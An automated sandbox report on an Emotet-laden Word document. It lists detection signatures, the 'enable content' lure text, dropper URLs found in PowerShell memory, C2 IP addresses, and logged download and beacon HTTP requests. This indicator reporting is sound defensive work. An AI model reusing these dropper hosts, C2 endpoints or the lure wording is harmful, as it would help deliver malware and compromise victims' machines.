Analysis Report Doc.doc

Overview

General Information

Sample Name: Doc.doc
Analysis ID: 337532
MD5: 16f391d60eff19aabb43225c85d5145c
SHA1: 58becf84bea5dafb9d46afc194a4eaf946fa4c72
SHA256: af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://goldilockstraining.com/wp-includes/bftt/ Avira URL Cloud: Label: malware
Source: http://biglaughs.org/smallpotatoes/rRwRzc/ Avira URL Cloud: Label: malware
Source: http://paulscomputing.com/CraigsMagicSquare/H/ Avira URL Cloud: Label: malware
Source: http://goldcoastoffice365.com/temp/X/ Avira URL Cloud: Label: phishing
Source: http://goldcoastoffice365.com/temp/X/P Avira URL Cloud: Label: phishing
Source: http://azraktours.com/wp-content/NWF9jC/ Avira URL Cloud: Label: malware
Source: http://josegene.com/theme/gU8/ Avira URL Cloud: Label: malware
Source: https://jeffdahlke.com/css/bg4n3/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: paulscomputing.com Virustotal: Detection: 11% Perma Link
Source: https://goldilockstraining.com/wp-includes/bftt/ Virustotal: Detection: 15% Perma Link
Source: http://biglaughs.org/smallpotatoes/rRwRzc/ Virustotal: Detection: 16% Perma Link
Source: http://paulscomputing.com Virustotal: Detection: 11% Perma Link
Source: http://paulscomputing.com/CraigsMagicSquare/H/ Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll ReversingLabs: Detection: 89%
Multi AV Scanner detection for submitted file
Source: Doc.doc Virustotal: Detection: 69% Perma Link
Source: Doc.doc ReversingLabs: Detection: 82%
Machine Learning detection for dropped file
Source: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002EA69B CryptDecodeObjectEx, 17_2_002EA69B
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2094362425.0000000002DD7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094179270.0000000002AE0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002E75F0 FindFirstFileW, 17_2_002E75F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: paulscomputing.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 167.71.148.58:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 216.218.207.98:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49171 -> 167.71.148.58:443
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: http://josegene.com/theme/gU8/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: https://jeffdahlke.com/css/bg4n3/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in memory: http://goldcoastoffice365.com/temp/X/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 167.71.148.58 167.71.148.58
Source: Joe Sandbox View IP Address: 202.187.222.40 202.187.222.40
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
Source: Joe Sandbox View ASN Name: SHAWCA SHAWCA
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ HTTP/1.1DNT: 0Referer: 167.71.148.58/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/Content-Type: multipart/form-data; boundary=-----------------------cs0BVrSncg9DYPKmcW5iNvLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7956Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 184.66.18.83
Source: unknown TCP traffic detected without corresponding DNS query: 202.187.222.40
Source: unknown TCP traffic detected without corresponding DNS query: 167.71.148.58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002E280B InternetReadFile, 17_2_002E280B
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /CraigsMagicSquare/H/ HTTP/1.1Host: paulscomputing.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: paulscomputing.com
Source: unknown HTTP traffic detected: POST /7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/ HTTP/1.1DNT: 0Referer: 167.71.148.58/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/Content-Type: multipart/form-data; boundary=-----------------------cs0BVrSncg9DYPKmcW5iNvLUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 7956Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://azraktours.com/wp-content/NWF9jC/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://biglaughs.org/smallpotatoes/rRwRzc/
Source: powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://goldcoastoffice365.com/temp/X/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp String found in binary or memory: http://goldcoastoffice365.com/temp/X/P
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://josegene.com/theme/gU8/
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp String found in binary or memory: http://paulscomputing.com
Source: powershell.exe, 00000005.00000002.2094330849.0000000002CF2000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: http://paulscomputing.com/CraigsMagicSquare/H/
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://goldilockstraining.com/wp-includes/bftt/
Source: powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp String found in binary or memory: https://jeffdahlke.com/css/bg4n3/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443

E-Banking Fraud:

Yara detected Emotet

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd"
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. . . . . O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 7696
Source: unknown Process created: Commandline size = 7605
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7605 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Lkvi\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00293618 7_2_00293618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029D668 7_2_0029D668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029766F 7_2_0029766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029427A 7_2_0029427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A8E79 7_2_002A8E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A2A7D 7_2_002A2A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A7A50 7_2_002A7A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A72AE 7_2_002A72AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0EA0 7_2_002A0EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00296ABA 7_2_00296ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002912B6 7_2_002912B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002AA2EA 7_2_002AA2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A9AE2 7_2_002A9AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00297AE4 7_2_00297AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029DEC9 7_2_0029DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029D2CE 7_2_0029D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A12D1 7_2_002A12D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A76D5 7_2_002A76D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029BB28 7_2_0029BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A0705 7_2_002A0705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A8313 7_2_002A8313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A5B60 7_2_002A5B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A5748 7_2_002A5748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00296342 7_2_00296342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00292746 7_2_00292746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002A3745 7_2_002A3745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029DB5B 7_2_0029DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00298F55 7_2_00298F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00293FAB 7_2_00293FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002967AC 7_2_002967AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B3A2 7_2_0029B3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002ACBB0 7_2_002ACBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029FFB5 7_2_0029FFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029EF80 7_2_0029EF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00293B97 7_2_00293B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B7F8 7_2_0029B7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002933F4 7_2_002933F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029C3C2 7_2_0029C3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A6005 8_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A3C28 8_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A7C4A 8_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AC44B 8_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B1079 8_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AE871 8_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B4460 8_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B0065 8_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AE499 8_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B9494 8_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001BC48F 8_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001ABCA5 8_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B5CCB 8_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AA4E1 8_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B1913 8_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A510E 8_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B5136 8_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A6D2C 8_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A3521 8_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001ADD24 8_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001BBD5E 8_2_001BBD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A415F 8_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B7D78 8_2_001B7D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001BB59B 8_2_001BB59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001BA59F 8_2_001BA59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A7D94 8_2_001A7D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A4DB8 8_2_001A4DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B41AD 8_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A75A0 8_2_001A75A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B2DE1 8_2_001B2DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A2A18 8_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A0A00 8_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B2A00 8_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C1600 8_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B6E50 8_2_001B6E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A367A 8_2_001A367A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B8279 8_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B1E7D 8_2_001B1E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001ACA68 8_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A6A6F 8_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A628A 8_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A5EBA 8_2_001A5EBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C12B6 8_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A06B6 8_2_001A06B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B66AE 8_2_001B66AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B02A0 8_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B06D1 8_2_001B06D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B6AD5 8_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AD2C9 8_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AC6CE 8_2_001AC6CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B96EA 8_2_001B96EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B8EE2 8_2_001B8EE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A6EE4 8_2_001A6EE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B7713 8_2_001B7713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A8B16 8_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AEF04 8_2_001AEF04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AFB05 8_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B473C 8_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001AAF28 8_2_001AAF28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001ACF5B 8_2_001ACF5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A8355 8_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001B4B48 8_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001A5742 8_2_001A5742
